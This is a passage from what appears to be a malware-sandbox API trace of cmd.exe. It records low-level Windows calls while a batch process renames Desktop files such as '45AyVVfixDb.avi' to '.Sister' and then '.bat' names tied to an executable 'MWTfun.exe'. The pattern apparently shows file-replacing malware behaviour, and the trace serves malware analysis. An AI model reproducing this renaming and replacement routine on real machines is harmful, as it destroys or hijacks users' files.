nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0139.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.976] GetFileType (hFile=0x50) returned 0x2 [0139.976] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.976] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0139.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.999] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d58cf0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d58cf0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0140.054] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0140.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.054] GetFileType (hFile=0x50) returned 0x2 [0140.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.054] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0140.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.075] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0140.110] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0140.110] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.110] GetFileType (hFile=0x50) returned 0x2 [0140.110] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.110] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0140.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.136] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0140.178] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0140.180] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0140.180] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0140.182] malloc (_Size=0xffce) returned 0x21ed90a0040 [0140.183] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0140.184] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0140.184] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0140.184] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0140.184] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0140.184] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0140.184] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0140.184] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0140.184] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0140.184] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0140.184] ??_V@YAXPEAX@Z () returned 0x1 [0140.184] GetProcessHeap () returned 0x21ed8c70000 [0140.184] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cddb20 [0140.184] GetProcessHeap () returned 0x21ed8c70000 [0140.184] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cddb20, Size=0x130) returned 0x21ed8cddb20 [0140.184] GetProcessHeap () returned 0x21ed8c70000 [0140.184] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cddb20) returned 0x130 [0140.184] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.185] malloc (_Size=0xffce) returned 0x21ed90a0040 [0140.185] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0140.185] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.185] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed90a0040, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.186] ??_V@YAXPEAX@Z () returned 0x1 [0140.186] GetProcessHeap () returned 0x21ed8c70000 [0140.186] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8cddc60 [0140.187] GetProcessHeap () returned 0x21ed8c70000 [0140.187] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cddda0 [0140.187] GetProcessHeap () returned 0x21ed8c70000 [0140.187] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cddda0, Size=0x130) returned 0x21ed8cddda0 [0140.187] GetProcessHeap () returned 0x21ed8c70000 [0140.187] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cddda0) returned 0x130 [0140.187] malloc (_Size=0xffce) returned 0x21ed90a0040 [0140.187] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0140.187] GetProcessHeap () returned 0x21ed8c70000 [0140.187] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43510 [0140.187] GetProcessHeap () returned 0x21ed8c70000 [0140.187] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31ed0 [0140.187] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0140.187] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0140.187] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0140.187] GetLastError () returned 0x2 [0140.187] GetProcessHeap () returned 0x21ed8c70000 [0140.187] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9290070 [0140.187] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9290080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0140.188] SetErrorMode (uMode=0x0) returned 0x0 [0140.188] SetErrorMode (uMode=0x1) returned 0x0 [0140.188] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed90a0040, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0140.188] SetErrorMode (uMode=0x0) returned 0x1 [0140.188] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0140.189] GetProcessHeap () returned 0x21ed8c70000 [0140.189] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31c60 [0140.189] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0140.189] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0140.189] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0140.189] GetLastError () returned 0x2 [0140.189] ??_V@YAXPEAX@Z () returned 0x1 [0140.189] malloc (_Size=0xffce) returned 0x21ed90a0040 [0140.189] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0140.189] malloc (_Size=0xffce) returned 0x21ed90b0020 [0140.189] ??_V@YAXPEAX@Z () returned 0x21ed90b0020 [0140.190] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0140.190] GetLastError () returned 0x2 [0140.190] _get_osfhandle (_FileHandle=2) returned 0x54 [0140.190] GetFileType (hFile=0x54) returned 0x2 [0140.190] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0140.190] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0140.198] _get_osfhandle (_FileHandle=2) returned 0x54 [0140.200] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0140.208] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0140.208] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0140.208] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0140.223] longjmp () [0140.223] ??_V@YAXPEAX@Z () returned 0x1 [0140.223] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4657f3a0, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x45ca9be0, ftLastAccessTime.dwHighDateTime=0x1d5e48f, ftLastWriteTime.dwLowDateTime=0x45ca9be0, ftLastWriteTime.dwHighDateTime=0x1d5e48f, nFileSizeHigh=0x0, nFileSizeLow=0x6ad4, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="45AyVVfixDb.avi", cAlternateFileName="")) returned 1 [0140.224] GetProcessHeap () returned 0x21ed8c70000 [0140.224] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd7c0, Size=0x118) returned 0x21ed8cddee0 [0140.224] GetProcessHeap () returned 0x21ed8c70000 [0140.224] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cddee0) returned 0x118 [0140.224] GetProcessHeap () returned 0x21ed8c70000 [0140.224] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d591c0 [0140.224] GetProcessHeap () returned 0x21ed8c70000 [0140.224] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d591c0, Size=0x30) returned 0x21ed8d591c0 [0140.224] GetProcessHeap () returned 0x21ed8c70000 [0140.224] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d591c0) returned 0x30 [0140.224] GetProcessHeap () returned 0x21ed8c70000 [0140.224] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59200 [0140.224] malloc (_Size=0x1ff9c) returned 0x21ed90c0000 [0140.245] GetProcessHeap () returned 0x21ed8c70000 [0140.245] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8bd0 [0140.245] ??_V@YAXPEAX@Z () returned 0x1 [0140.246] GetProcessHeap () returned 0x21ed8c70000 [0140.246] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59200, Size=0x170) returned 0x21ed8d59200 [0140.246] GetProcessHeap () returned 0x21ed8c70000 [0140.246] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59200) returned 0x170 [0140.246] GetProcessHeap () returned 0x21ed8c70000 [0140.247] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59380 [0140.247] GetProcessHeap () returned 0x21ed8c70000 [0140.247] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59380, Size=0x290) returned 0x21ed8d59380 [0140.247] GetProcessHeap () returned 0x21ed8c70000 [0140.247] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59380) returned 0x290 [0140.247] GetProcessHeap () returned 0x21ed8c70000 [0140.247] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59620 [0140.247] GetProcessHeap () returned 0x21ed8c70000 [0140.247] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59620, Size=0x30) returned 0x21ed8d59620 [0140.247] GetProcessHeap () returned 0x21ed8c70000 [0140.247] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59620) returned 0x30 [0140.247] GetProcessHeap () returned 0x21ed8c70000 [0140.247] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d59660 [0140.247] malloc (_Size=0x1ff9c) returned 0x21ed90c0000 [0140.249] GetProcessHeap () returned 0x21ed8c70000 [0140.249] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8650 [0140.249] ??_V@YAXPEAX@Z () returned 0x1 [0140.250] malloc (_Size=0x1ff9c) returned 0x21ed90c0000 [0140.256] GetFullPathNameW (in: lpFileName="45AyVVfixDb.avi", nBufferLength=0xffce, lpBuffer=0x21ed90c0000, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi", lpFilePart=0xa6cf4fe1c8*="45AyVVfixDb.avi") returned 0x27 [0140.256] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x11, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43210 [0140.261] FindClose (in: hFindFile=0x21ed8d43210 | out: hFindFile=0x21ed8d43210) returned 1 [0140.261] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x11, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42fd0 [0140.261] FindClose (in: hFindFile=0x21ed8d42fd0 | out: hFindFile=0x21ed8d42fd0) returned 1 [0140.261] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7deb79c5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7deb79c5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x11, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d439f0 [0140.262] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0140.262] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\45AyVVfixDb.avi", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4657f3a0, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x45ca9be0, ftLastAccessTime.dwHighDateTime=0x1d5e48f, ftLastWriteTime.dwLowDateTime=0x45ca9be0, ftLastWriteTime.dwHighDateTime=0x1d5e48f, nFileSizeHigh=0x0, nFileSizeLow=0x6ad4, dwReserved0=0x4, dwReserved1=0x11, cFileName="45AyVVfixDb.avi", cAlternateFileName="45AYVV~1.AVI")) returned 0x21ed8d43030 [0140.262] FindClose (in: hFindFile=0x21ed8d43030 | out: hFindFile=0x21ed8d43030) returned 1 [0140.262] _wcsnicmp (_String1="45AYVV~1.AVI", _String2="45AyVVfixDb.avi", _MaxCount=0xf) returned 24 [0140.262] malloc (_Size=0x1ff9c) returned 0x21ed90dffb0 [0140.263] ??_V@YAXPEAX@Z () returned 0x21ed90dffb0 [0140.264] GetProcessHeap () returned 0x21ed8c70000 [0140.264] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8cdd1e0 [0140.264] ??_V@YAXPEAX@Z () returned 0x1 [0140.264] ??_V@YAXPEAX@Z () returned 0x1 [0140.265] GetProcessHeap () returned 0x21ed8c70000 [0140.265] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d59660, Size=0x170) returned 0x21ed8d59660 [0140.265] GetProcessHeap () returned 0x21ed8c70000 [0140.265] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d59660) returned 0x170 [0140.265] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0140.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.265] GetFileType (hFile=0x50) returned 0x2 [0140.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.265] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0140.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.278] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0140.306] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0140.306] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0140.306] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0140.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.306] GetFileType (hFile=0x50) returned 0x2 [0140.306] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.306] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0140.344] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.344] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0140.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.441] GetFileType (hFile=0x50) returned 0x2 [0140.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.441] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0140.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.469] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d591d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d591d0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0140.488] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"45AyVVfixDb.avi\" \"45AyVVfixDb.avi.Sister\" ") returned 44 [0140.488] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.488] GetFileType (hFile=0x50) returned 0x2 [0140.488] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.488] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0140.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.506] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2c) returned 1 [0140.511] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0140.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.511] GetFileType (hFile=0x50) returned 0x2 [0140.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.511] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0140.514] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.514] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0140.516] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0140.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.516] GetFileType (hFile=0x50) returned 0x2 [0140.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.516] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0140.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.520] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0140.524] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0140.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.524] GetFileType (hFile=0x50) returned 0x2 [0140.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.524] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0140.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.526] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0140.547] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0140.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.547] GetFileType (hFile=0x50) returned 0x2 [0140.547] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.547] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0140.568] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.568] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0140.575] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.576] GetFileType (hFile=0x50) returned 0x2 [0140.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.576] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0140.577] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.577] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d59630*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d59630*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0140.578] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.bat\" ") returned 44 [0140.578] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.579] GetFileType (hFile=0x50) returned 0x2 [0140.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0140.579] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0140.580] _get_osfhandle (_FileHandle=1) returned 0x50 [0140.580] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2c) returned 1 [0140.581] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", 